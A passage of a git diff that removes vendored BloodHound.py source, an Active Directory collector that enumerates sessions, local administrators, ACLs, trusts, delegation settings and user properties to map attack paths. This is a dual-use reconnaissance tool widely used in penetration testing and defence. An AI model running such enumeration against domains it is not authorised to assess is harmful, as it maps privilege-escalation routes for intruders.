acetype, 'inherited': inherited} - -class AclEnumerator(object): - """ - Helper class for ACL parsing. - """ - def __init__(self, addomain, addc, collect): - self.addomain = addomain - self.addc = addc - # Store collection methods specified - self.collect = collect - self.pool = None - - def init_pool(self): - self.pool = Pool() - -""" -The following is Security Descriptor parsing using cstruct -Thanks to Erik Schamper for helping me implement this! -""" -cdef = native_str(""" -struct SECURITY_DESCRIPTOR { - uint8 Revision; - uint8 Sbz1; - uint16 Control; - uint32 OffsetOwner; - uint32 OffsetGroup; - uint32 OffsetSacl; - uint32 OffsetDacl; -}; - -struct LDAP_SID_IDENTIFIER_AUTHORITY { - char Value[6]; -}; - -struct LDAP_SID { - uint8 Revision; - uint8 SubAuthorityCount; - LDAP_SID_IDENTIFIER_AUTHORITY IdentifierAuthority; - uint32 SubAuthority[SubAuthorityCount]; -}; - -struct ACL { - uint8 AclRevision; - uint8 Sbz1; - uint16 AclSize; - uint16 AceCount; - uint16 Sbz2; - char Data[AclSize - 8]; -}; - -struct ACE { - uint8 AceType; - uint8 AceFlags; - uint16 AceSize; - char Data[AceSize - 4]; -}; - -struct ACCESS_ALLOWED_ACE { - uint32 Mask; - LDAP_SID Sid; -}; - -struct ACCESS_ALLOWED_OBJECT_ACE { - uint32 Mask; - uint32 Flags; - char ObjectType[Flags & 1 * 16]; - char InheritedObjectType[Flags & 2 * 8]; - LDAP_SID Sid; -}; -""") -c_secd = cstruct() -c_secd.load(cdef, compiled=True) - - -class SecurityDescriptor(object): - def __init__(self, fh): - self.fh = fh - self.descriptor = c_secd.SECURITY_DESCRIPTOR(fh) - - self.owner_sid = b'' - self.group_sid = b'' - self.sacl = b'' - self.dacl = b'' - - if self.descriptor.OffsetOwner != 0: - fh.seek(self.descriptor.OffsetOwner) - self.owner_sid = LdapSid(fh=fh) - - if self.descriptor.OffsetGroup != 0: - fh.seek(self.descriptor.OffsetGroup) - self.group_sid = LdapSid(fh=fh) - - if self.descriptor.OffsetSacl != 0: - fh.seek(self.descriptor.OffsetSacl) - self.sacl = ACL(fh) - - if self.descriptor.OffsetDacl != 0: - fh.seek(self.descriptor.OffsetDacl) - self.dacl = ACL(fh) - - -class LdapSid(object): - def __init__(self, fh=None, in_obj=None): - if fh: - self.fh = fh - self.ldap_sid = c_secd.LDAP_SID(fh) - else: - self.ldap_sid = in_obj - - def __repr__(self): - return "S-{}-{}-{}".format(self.ldap_sid.Revision, bytearray(self.ldap_sid.IdentifierAuthority.Value)[5], "-".join(['{:d}'.format(v) for v in self.ldap_sid.SubAuthority])) - - -class ACL(object): - def __init__(self, fh): - self.fh = fh - self.acl = c_secd.ACL(fh) - self.aces = [] - - buf = BytesIO(self.acl.Data) - for i in range(self.acl.AceCount): - self.aces.append(ACE(buf)) - - -class ACCESS_ALLOWED_ACE(object): - def __init__(self, fh): - self.fh = fh - self.data = c_secd.ACCESS_ALLOWED_ACE(fh) - self.sid = LdapSid(in_obj=self.data.Sid) - self.mask = ACCESS_MASK(self.data.Mask) - - def __repr__(self): - return "" % (str(self.sid), str(self.mask)) - -class ACCESS_DENIED_ACE(ACCESS_ALLOWED_ACE): - pass - - -class ACCESS_ALLOWED_OBJECT_ACE(object): - # Flag constants - ACE_OBJECT_TYPE_PRESENT = 0x01 - ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x02 - - def __init__(self, fh): - self.fh = fh - self.data = c_secd.ACCESS_ALLOWED_OBJECT_ACE(fh) - self.sid = LdapSid(in_obj=self.data.Sid) - self.mask = ACCESS_MASK(self.data.Mask) - - def has_flag(self, flag): - return self.data.Flags & flag == flag - - def get_object_type(self): - if self.has_flag(self.ACE_OBJECT_TYPE_PRESENT): - return bin_to_string(self.data.ObjectType) - return None - - def get_inherited_object_type(self): - if self.has_flag(self.ACE_INHERITED_OBJECT_TYPE_PRESENT): - return bin_to_string(self.data.InheritedObjectType) - return None - - def __repr__(self): - out = [] - for name, value in iteritems(vars(ACCESS_ALLOWED_OBJECT_ACE)): - if not name.startswith('_') and type(value) is int and self.has_flag(value): - out.append(name) - data = (' | '.join(out), - str(self.sid), - str(self.mask), - self.get_object_type(), - self.get_inherited_object_type()) - return "" % data - -class ACCESS_DENIED_OBJECT_ACE(ACCESS_ALLOWED_OBJECT_ACE): - pass - - -""" -ACCESS_MASK as described in 2.4.3 -https://msdn.microsoft.com/en-us/library/cc230294.aspx -""" -class ACCESS_MASK(object): - # Flag constants - - # These constants are only used when WRITING - # and are then translated into their actual rights - SET_GENERIC_READ = 0x80000000 - SET_GENERIC_WRITE = 0x04000000 - SET_GENERIC_EXECUTE = 0x20000000 - SET_GENERIC_ALL = 0x10000000 - # When reading, these constants are actually represented by - # the following for Active Directory specific Access Masks - # Reference: https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2 - GENERIC_READ = 0x00020094 - GENERIC_WRITE = 0x00020028 - GENERIC_EXECUTE = 0x00020004 - GENERIC_ALL = 0x000F01FF - - # These are actual rights (for all ACE types) - MAXIMUM_ALLOWED = 0x02000000 - ACCESS_SYSTEM_SECURITY = 0x01000000 - SYNCHRONIZE = 0x00100000 - WRITE_OWNER = 0x00080000 - WRITE_DACL = 0x00040000 - READ_CONTROL = 0x00020000 - DELETE = 0x00010000 - - # ACE type specific mask constants (for ACCESS_ALLOWED_OBJECT_ACE) - # Note that while not documented, these also seem valid - # for ACCESS_ALLOWED_ACE types - ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100 - ADS_RIGHT_DS_CREATE_CHILD = 0x00000001 - ADS_RIGHT_DS_DELETE_CHILD = 0x00000002 - ADS_RIGHT_DS_READ_PROP = 0x00000010 - ADS_RIGHT_DS_WRITE_PROP = 0x00000020 - ADS_RIGHT_DS_SELF = 0x00000008 - - def __init__(self, mask): - self.mask = mask - - def has_priv(self, priv): - return self.mask & priv == priv - - def set_priv(self, priv): - self.mask |= priv - - def remove_priv(self, priv): - self.mask ^= priv - - def __repr__(self): - out = [] - for name, value in iteritems(vars(ACCESS_MASK)): - if not name.startswith('_') and type(value) is int and self.has_priv(value): - out.append(name) - return "" % (self.mask, ' | '.join(out)) - - - -class ACE(object): - CONTAINER_INHERIT_ACE = 0x02 - FAILED_ACCESS_ACE_FLAG = 0x80 - INHERIT_ONLY_ACE = 0x08 - INHERITED_ACE = 0x10 - NO_PROPAGATE_INHERIT_ACE = 0x04 - OBJECT_INHERIT_ACE = 0x01 - SUCCESSFUL_ACCESS_ACE_FLAG = 0x04 - - def __init__(self, fh): - self.fh = fh - self.ace = c_secd.ACE(fh) - self.acedata = None - buf = BytesIO(self.ace.Data) - if self.ace.AceType == 0x00: - # ACCESS_ALLOWED_ACE - self.acedata = ACCESS_ALLOWED_ACE(buf) - elif self.ace.AceType == 0x05: - # ACCESS_ALLOWED_OBJECT_ACE - self.acedata = ACCESS_ALLOWED_OBJECT_ACE(buf) - elif self.ace.AceType == 0x01: - # ACCESS_DENIED_ACE - self.acedata = ACCESS_DENIED_ACE(buf) - elif self.ace.AceType == 0x06: - # ACCESS_DENIED_OBJECT_ACE - self.acedata = ACCESS_DENIED_OBJECT_ACE(buf) - # else: - # print 'Unsupported type %d' % self.ace.AceType - - if self.acedata: - self.mask = ACCESS_MASK(self.acedata.data.Mask) - - def __repr__(self): - out = [] - for name, value in iteritems(vars(ACE)): - if not name.startswith('_') and type(value) is int and self.has_flag(value): - out.append(name) - return "" % (self.ace.AceType, ' | '.join(out), self.ace.AceFlags, str(self.acedata)) - - def has_flag(self, flag): - return self.ace.AceFlags & flag == flag diff --git a/external/bloodhound/enumeration/computers.py b/external/bloodhound/enumeration/computers.py deleted file mode 100755 index 77917f7..0000000 --- a/external/bloodhound/enumeration/computers.py +++ /dev/null @@ -1,263 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -from __future__ import unicode_literals -import queue -import threading -import logging -import traceback -from impacket.dcerpc.v5.rpcrt import DCERPCException -from .outputworker import OutputWorker -from .memberships import MembershipEnumerator -from . .ad.computer import ADComputer -from . .ad.utils import ADUtils -from future.utils import itervalues, iteritems, native_str - -class ComputerEnumerator(MembershipEnumerator): - """ - Class to enumerate computers in the domain. - Contains the threading logic and workers which will call the collection - methods from the bloodhound.ad module. - - This class extends the MembershipEnumerator class just to inherit the - membership lookup functions which are also needed for computers. - """ - def __init__(self, addomain, addc, collect, do_gc_lookup=True): - """ - Computer enumeration. Enumerates all computers in the given domain. - Every domain enumerated will get its own instance of this class. - """ - self.addomain = addomain - self.addc = addc - # Blacklist and whitelist are only used for debugging purposes - self.blacklist = [] - self.whitelist = [] - self.do_gc_lookup = do_gc_lookup - # Store collection methods specified - self.collect = collect - - def enumerate_computers(self, computers, num_workers=10): - """ - Enumerates the computers in the domain. Is threaded, you can specify the number of workers. - Will spawn threads to resolve computers and enumerate the information. - """ - process_queue = queue.Queue() - - result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.write_worker, args=(result_q, 'computers.json')) - results_worker.daemon = True - results_worker.start() - logging.info('Starting computer enumeration with %d workers', num_workers) - if len(computers) / num_workers > 500: - logging.info('The workload seems to be rather large. Consider increasing the number of workers.') - for _ in range(0, num_workers): - thread = threading.Thread(target=self.work, args=(process_queue, result_q)) - thread.daemon = True - thread.start() - - for _, computer in iteritems(computers): - if not 'attributes' in computer: - continue - - if 'dNSHostName' not in computer['attributes']: - continue - - hostname = computer['attributes']['dNSHostName'] - if not hostname: - continue - samname = computer['attributes']['sAMAccountName'] - # For debugging purposes only - if hostname in self.blacklist: - logging.info('Skipping computer: %s (blacklisted)', hostname) - continue - if len(self.whitelist) > 0 and hostname not in self.whitelist: - logging.info('Skipping computer: %s (not whitelisted)', hostname) - continue - - process_queue.put((hostname, samname, computer)) - process_queue.join() - result_q.put(None) - result_q.join() - - def process_computer(self, hostname, samname, objectsid, entry, results_q): - """ - Processes a single computer, pushes the results of the computer to the given queue. - """ - logging.debug('Querying computer: %s', hostname) - c = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, addc=self.addc, objectsid=objectsid) - c.primarygroup = self.get_primary_membership(entry) - if c.try_connect() == True: - try: - - if 'session' in self.collect: - sessions = c.rpc_get_sessions() - else: - sessions = [] - if 'localadmin' in self.collect: - unresolved = c.rpc_get_group_members(544, c.admins) - c.rpc_resolve_sids(unresolved, c.admins) - if 'rdp' in self.collect: - unresolved = c.rpc_get_group_members(555, c.rdp) - c.rpc_resolve_sids(unresolved, c.rdp) - if 'dcom' in self.collect: - unresolved = c.rpc_get_group_members(562, c.dcom) - c.rpc_resolve_sids(unresolved, c.dcom) - if 'psremote' in self.collect: - unresolved = c.rpc_get_group_members(580, c.psremote) - c.rpc_resolve_sids(unresolved, c.psremote) - if 'loggedon' in self.collect: - loggedon = c.rpc_get_loggedon() - else: - loggedon = [] - if 'experimental' in self.collect: - services = c.rpc_get_services() - tasks = c.rpc_get_schtasks() - else: - services = [] - tasks = [] - - c.rpc_close() - # c.rpc_get_domain_trusts() - - if sessions is None: - sessions = [] - - # Should we use the GC? - use_gc = self.addomain.num_domains > 1 and self.do_gc_lookup - - # Process found sessions - for ses in sessions: - # For every session, resolve the SAM name in the GC if needed - domain = self.addomain.domain - try: - users = self.addomain.samcache.get(samname) - except KeyError: - # Look up the SAM name in the GC - entries = self.addomain.objectresolver.resolve_samname(ses['user'], use_gc=use_gc) - if entries is not None: - users = [user['attributes']['objectSid'] for user in entries] - if entries is None or users == []: - logging.warning('Failed to resolve SAM name %s in current forest', samname) - continue - self.addomain.samcache.put(samname, users) - - # Resolve the IP to obtain the host the session is from - try: - target = self.addomain.dnscache.get(ses['source']) - except KeyError: - # TODO: also use discovery based on port 445 connections similar to sharphound - target = ADUtils.ip2host(ses['source'], self.addomain.dnsresolver, self.addomain.dns_tcp) - # Even if the result is the IP (aka could not resolve PTR) we still cache - # it since this result is unlikely to change during this run - self.addomain.dnscache.put_single(ses['source'], target) - if ':' in target: - # IPv6 address, not very useful - continue - if '.' not in target: - logging.debug('Resolved target does not look like an IP or domain. Assuming hostname: %s', target) - target = '%s.%s' % (target, domain) - # Resolve target hostname - try: - hostsid = self.addomain.computersidcache.get(target.lower()) - except KeyError: - logging.warning('Could not resolve hostname to SID: %s', target) - continue - - # Put the result on the results queue. - for user in users: - c.sessions.append({'ComputerId':hostsid, 'UserId':user}) - if loggedon is None: - loggedon = [] - - # Put the logged on users on the queue too - for user, userdomain in loggedon: - # Construct fake UPN to cache this user - fupn = '%s@%s' % (user.upper(), userdomain.upper()) - try: - users = self.addomain.samcache.get(fupn) - except KeyError: - entries = self.addomain.objectresolver.resolve_samname(user, use_gc=use_gc) - if entries is not None: - if len(entries) > 1: - for resolved_user in entries: - edn = ADUtils.get_entry_property(resolved_user, 'distinguishedName') - edom = ADUtils.ldap2domain(edn).lower() - if edom == userdomain.lower(): - users = [resolved_user['attributes']['objectSid']] - break - logging.debug('Skipping resolved user %s since domain does not match (%s != %s)', edn, edom, userdomain.lower()) - else: - users = [resolved_user['attributes']['objectSid'] for resolved_user in entries] - if entries is None or users == []: - logging.warning('Failed to resolve SAM name %s in current forest', samname) - continue - self.addomain.samcache.put(fupn, users) - for resultuser in users: - c.sessions.append({'ComputerId':objectsid, 'UserId':resultuser}) - - # Process Tasks - for taskuser in tasks: - c.sessions.append({'ComputerId':objectsid, 'UserId':taskuser}) - - # Process Services - for serviceuser in services: - try: - user = self.addomain.sidcache.get(serviceuser) - except KeyError: - # Resolve UPN in GC - userentry = self.addomain.objectresolver.resolve_upn(serviceuser) - # Resolve it to an entry and store in the cache - self.addomain.sidcache.put(serviceuser, userentry['attributes']['objectSid']) - user = userentry['attributes']['objectSid'] - logging.debug('Resolved Service UPN to SID: %s', user['objectsid']) - c.sessions.append({'ComputerId':objectsid, 'UserId':user}) - - results_q.put(('computer', c.get_bloodhound_data(entry, self.collect))) - - - except DCERPCException: - logging.debug(traceback.format_exc()) - logging.warning('Querying computer failed: %s', hostname) - except Exception as e: - logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e)) - logging.info(traceback.format_exc()) - else: - # Write the info we have to the file regardless - try: - results_q.put(('computer', c.get_bloodhound_data(entry, self.collect))) - except Exception as e: - logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e)) - logging.info(traceback.format_exc()) - - def work(self, process_queue, results_q): - """ - Work function, will obtain work from the given queue and will push results on the results_q. - """ - logging.debug('Start working') - - while True: - hostname, samname, entry = process_queue.get() - objectsid = entry['attributes']['objectSid'] - logging.info('Querying computer: %s', hostname) - self.process_computer(hostname, samname, objectsid, entry, results_q) - process_queue.task_done() diff --git a/external/bloodhound/enumeration/domains.py b/external/bloodhound/enumeration/domains.py deleted file mode 100755 index 23d5e04..0000000 --- a/external/bloodhound/enumeration/domains.py +++ /dev/null @@ -1,137 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import codecs -import json -from . .ad.utils import ADUtils, AceResolver -from . .ad.trusts import ADDomainTrust -from .acls import parse_binary_acl - -class DomainEnumerator(object): - """ - Class to enumerate trusts in the domain. - Contains the dumping functions which - methods from the bloodhound.ad module. - """ - def __init__(self, addomain, addc): - """ - Trusts enumeration. Enumerates all trusts between the source domain - and other domains/forests. - """ - self.addomain = addomain - self.addc = addc - - def dump_domain(self, collect, filename='domains.json'): - """ - Dump trusts. This is currently the only domain info we support, so - this function handles the entire domain dumping. - """ - if 'trusts' in collect: - entries = self.addc.get_trusts() - else: - entries = [] - - try: - logging.debug('Opening file for writing: %s' % filename) - out = codecs.open(filename, 'w', 'utf-8') - except: - logging.warning('Could not write file: %s' % filename) - return - - # If the logging level is DEBUG, we ident the objects - if logging.getLogger().getEffectiveLevel() == logging.DEBUG: - indent_level = 1 - else: - indent_level = None - - # Todo: fix this properly. Current code is quick fix to work with domains - # that have custom casing in their DN - domain_object = None - for domain in self.addomain.domains.keys(): - if domain.lower() == self.addomain.baseDN.lower(): - domain_object = self.addomain.domains[domain] - break - - if not domain_object: - logging.error('Could not find domain object. Aborting domain enumeration') - return - - # Initialize json structure - datastruct = { - "domains": [], - "meta": { - "type": "domains", - "count": 0, - "version":3 - } - } - # Get functional level - level_id = ADUtils.get_entry_property(domain_object, 'msds-behavior-version') - try: - functional_level = ADUtils.FUNCTIONAL_LEVELS[int(level_id)] - except KeyError: - functional_level = 'Unknown' - - domain = { - "ObjectIdentifier": domain_object['attributes']['objectSid'], - "Properties": { - "name": self.addomain.domain.upper(), - "domain": self.addomain.domain.upper(), - "highvalue": True, - "objectid": ADUtils.get_entry_property(domain_object, 'objectSid'), - "distinguishedname": ADUtils.get_entry_property(domain_object, 'distinguishedName'), - "description": ADUtils.get_entry_property(domain_object, 'description'), - "functionallevel": functional_level - }, - "Trusts": [], - "Aces": [], - # The below is all for GPO collection, unsupported as of now. - "Links": [], - "Users": [], - "Computers": [], - "ChildOus": [] - } - - if 'acl' in collect: - resolver = AceResolver(self.addomain, self.addomain.objectresolver) - _, aces = parse_binary_acl(domain, 'domain', ADUtils.get_entry_property(domain_object, 'nTSecurityDescriptor'), self.addc.objecttype_guid_map) - domain['Aces'] = resolver.resolve_aces(aces) - - if 'trusts' in collect: - num_entries = 0 - for entry in entries: - num_entries += 1 - trust = ADDomainTrust(ADUtils.get_entry_property(entry, 'name'), ADUtils.get_entry_property(entry, 'trustDirection'), ADUtils.get_entry_property(entry, 'trustType'), ADUtils.get_entry_property(entry, 'trustAttributes'), ADUtils.get_entry_property(entry, 'securityIdentifier')) - domain['Trusts'].append(trust.to_output()) - - logging.info('Found %u trusts', num_entries) - - # Single domain only - datastruct['meta']['count'] = 1 - datastruct['domains'].append(domain) - json.dump(datastruct, out, indent=indent_level) - - logging.debug('Finished writing domain info') - out.close() diff --git a/external/bloodhound/enumeration/memberships.py b/external/bloodhound/enumeration/memberships.py deleted file mode 100755 index 9b3061c..0000000 --- a/external/bloodhound/enumeration/memberships.py +++ /dev/null @@ -1,493 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import queue -import threading -from . .ad.utils import ADUtils, AceResolver -from . .ad.computer import ADComputer -from .acls import AclEnumerator, parse_binary_acl -from .outputworker import OutputWorker - -class MembershipEnumerator(object): - """ - Class to enumerate memberships in the domain. - Contains the dumping functions which - methods from the bloodhound.ad module. - """ - def __init__(self, addomain, addc, collect, disable_pooling): - """ - Membership enumeration. Enumerates all groups/users/other memberships. - """ - self.addomain = addomain - self.addc = addc - # Store collection methods specified - self.collect = collect - self.disable_pooling = disable_pooling - self.aclenumerator = AclEnumerator(addomain, addc, collect) - self.aceresolver = AceResolver(addomain, addomain.objectresolver) - self.result_q = None - - def get_membership(self, member): - """ - Attempt to resolve the membership (DN) of a group to an object - """ - # First assume it is a user - try: - resolved_entry = self.addomain.users[member] - except KeyError: - # Try if it is a group - try: - resolved_entry = self.addomain.groups[member] - except KeyError: - # Try if it is a computer - try: - entry = self.addomain.computers[member] - # Computers are stored as raw entries - resolved_entry = ADUtils.resolve_ad_entry(entry) - except KeyError: - use_gc = ADUtils.ldap2domain(member) != self.addomain.domain - qobject = self.addomain.objectresolver.resolve_distinguishedname(member, use_gc=use_gc) - if qobject is None: - return None - resolved_entry = ADUtils.resolve_ad_entry(qobject) - # Store it in the cache - if resolved_entry['type'] == 'user': - self.addomain.users[member] = resolved_entry - if resolved_entry['type'] == 'group': - self.addomain.groups[member] = resolved_entry - # Computers are stored as raw entries - if resolved_entry['type'] == 'computer': - self.addomain.computers[member] = qobject - return { - "MemberId": resolved_entry['objectid'], - "MemberType": resolved_entry['type'].capitalize() - } - - @staticmethod - def get_primary_membership(entry): - """ - Construct primary membership from RID to SID (BloodHound 3.0 only) - """ - try: - primarygroupid = int(entry['attributes']['primaryGroupID']) - except (TypeError, KeyError): - # Doesn't have a primarygroupid, means it is probably a Group instead of a user - return None - return '%s-%d' % ('-'.join(entry['attributes']['objectSid'].split('-')[:-1]), primarygroupid) - - @staticmethod - def add_user_properties(user, entry): - """ - Resolve properties for user objects - """ - props = user['Properties'] - # print entry - # Is user enabled? Checked by seeing if the UAC flag 2 (ACCOUNT_DISABLED) is not set - props['enabled'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 2 == 0 - props['lastlogon'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'lastLogon', default=0, raw=True) - ) - if props['lastlogon'] == 0: - props['lastlogon'] = -1 - props['lastlogontimestamp'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'lastlogontimestamp', default=0, raw=True) - ) - if props['lastlogontimestamp'] == 0: - props['lastlogontimestamp'] = -1 - props['pwdlastset'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'pwdLastSet', default=0, raw=True) - ) - props['dontreqpreauth'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00400000 == 0x00400000 - props['pwdneverexpires'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00010000 == 0x00010000 - props['sensitive'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00100000 == 0x00100000 - props['serviceprincipalnames'] = ADUtils.get_entry_property(entry, 'servicePrincipalName', []) - props['hasspn'] = len(props['serviceprincipalnames']) > 0 - props['displayname'] = ADUtils.get_entry_property(entry, 'displayName') - props['email'] = ADUtils.get_entry_property(entry, 'mail') - props['title'] = ADUtils.get_entry_property(entry, 'title') - props['homedirectory'] = ADUtils.get_entry_property(entry, 'homeDirectory') - props['description'] = ADUtils.get_entry_property(entry, 'description') - props['userpassword'] = ADUtils.get_entry_property(entry, 'userPassword') - props['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', 0) == 1 - if len(ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', [])) > 0: - props['allowedtodelegate'] = ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', []) - props['sidhistory'] = ADUtils.get_entry_property(entry, 'sIDHistory', []) - - def enumerate_users(self): - filename = 'users.json' - - # Should we include extra properties in the query? - with_properties = 'objectprops' in self.collect - acl = 'acl' in self.collect - entries = self.addc.get_users(include_properties=with_properties, acl=acl) - - logging.debug('Writing users to file: %s', filename) - - # Use a separate queue for processing the results - self.result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'users', filename)) - results_worker.daemon = True - results_worker.start() - - if acl and not self.disable_pooling: - self.aclenumerator.init_pool() - - # This loops over a generator, results are fetched from LDAP on the go - for entry in entries: - resolved_entry = ADUtils.resolve_ad_entry(entry) - # Skip trust objects - if resolved_entry['type'] == 'trustaccount': - continue - user = { - "AllowedToDelegate": [], - "ObjectIdentifier": ADUtils.get_entry_property(entry, 'objectSid'), - "PrimaryGroupSid": MembershipEnumerator.get_primary_membership(entry), - "Properties": { - "name": resolved_entry['principal'], - "domain": self.addomain.domain.upper(), - "objectid": ADUtils.get_entry_property(entry, 'objectSid'), - "distinguishedname":ADUtils.get_entry_property(entry, 'distinguishedName'), - "highvalue": False, - "unconstraineddelegation": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00080000 == 0x00080000, - "passwordnotreqd": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00000020 == 0x00000020 - }, - "Aces": [], - "SPNTargets": [], - "HasSIDHistory": [] - } - - if with_properties: - MembershipEnumerator.add_user_properties(user, entry) - if 'allowedtodelegate' in user['Properties']: - for host in user['Properties']['allowedtodelegate']: - try: - target = host.split('/')[1] - except IndexError: - logging.warning('Invalid delegation target: %s', host) - continue - try: - sid = self.addomain.computersidcache.get(target.lower()) - user['AllowedToDelegate'].append(sid) - except KeyError: - if '.' in target: - user['AllowedToDelegate'].append(target.upper()) - # Parse SID history - if len(user['Properties']['sidhistory']) > 0: - for historysid in user['Properties']['sidhistory']: - user['HasSIDHistory'].append(self.aceresolver.resolve_binary_sid(historysid)) - - # If this is a GMSA, process it's ACL. We don't bother with threads/processes here - # since these accounts shouldn't be that common and neither should they have very complex - # DACLs which control who can read their password - if ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', default=b'', raw=True) != b'': - self.parse_gmsa(user, entry) - - self.addomain.users[entry['dn']] = resolved_entry - # If we are enumerating ACLs, we break out of the loop here - # this is because parsing ACLs is computationally heavy and therefor is done in subprocesses - if acl: - if self.disable_pooling: - # Debug mode, don't run this pooled since it hides exceptions - self.process_acldata(parse_binary_acl(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map)) - else: - # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file - self.aclenumerator.pool.apply_async(parse_binary_acl, args=(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata) - else: - # Write it to the queue -> write to file in separate thread - # this is solely for consistency with acl parsing, the performance improvement is probably minimal - self.result_q.put(user) - - # If we are parsing ACLs, close the parsing pool first - # then close the result queue and join it - if acl and not self.disable_pooling: - self.aclenumerator.pool.close() - self.aclenumerator.pool.join() - self.result_q.put(None) - else: - self.result_q.put(None) - self.result_q.join() - - logging.debug('Finished writing users') - - def enumerate_groups(self): - - highvalue = ["S-1-5-32-544", "S-1-5-32-550", "S-1-5-32-549", "S-1-5-32-551", "S-1-5-32-548"] - - def is_highvalue(sid): - if sid.endswith("-512") or sid.endswith("-516") or sid.endswith("-519") or sid.endswith("-520"): - return True - if sid in highvalue: - return True - return False - - # Should we include extra properties in the query? - with_properties = 'objectprops' in self.collect - acl = 'acl' in self.collect - - filename = 'groups.json' - entries = self.addc.get_groups(include_properties=with_properties, acl=acl) - - logging.debug('Writing groups to file: %s', filename) - - # Use a separate queue for processing the results - self.result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'groups', filename)) - results_worker.daemon = True - results_worker.start() - - if acl and not self.disable_pooling: - self.aclenumerator.init_pool() - - for entry in entries: - resolved_entry = ADUtils.resolve_ad_entry(entry) - self.addomain.groups[entry['dn']] = resolved_entry - try: - sid = entry['attributes']['objectSid'] - except KeyError: - #Somehow we found a group without a sid? - logging.warning('Could not determine SID for group %s', entry['attributes']['distinguishedName']) - continue - group = { - "ObjectIdentifier": sid, - "Properties": { - "domain": self.addomain.domain.upper(), - "objectid": sid, - "highvalue": is_highvalue(sid), - "name": resolved_entry['principal'], - "distinguishedname": ADUtils.get_entry_property(entry, 'distinguishedName') - }, - "Members": [], - "Aces": [] - } - if sid in ADUtils.WELLKNOWN_SIDS: - # Prefix it with the domain - group['ObjectIdentifier'] = '%s-%s' % (self.addomain.domain.upper(), sid) - group['Properties']['objectid'] = group['ObjectIdentifier'] - if with_properties: - 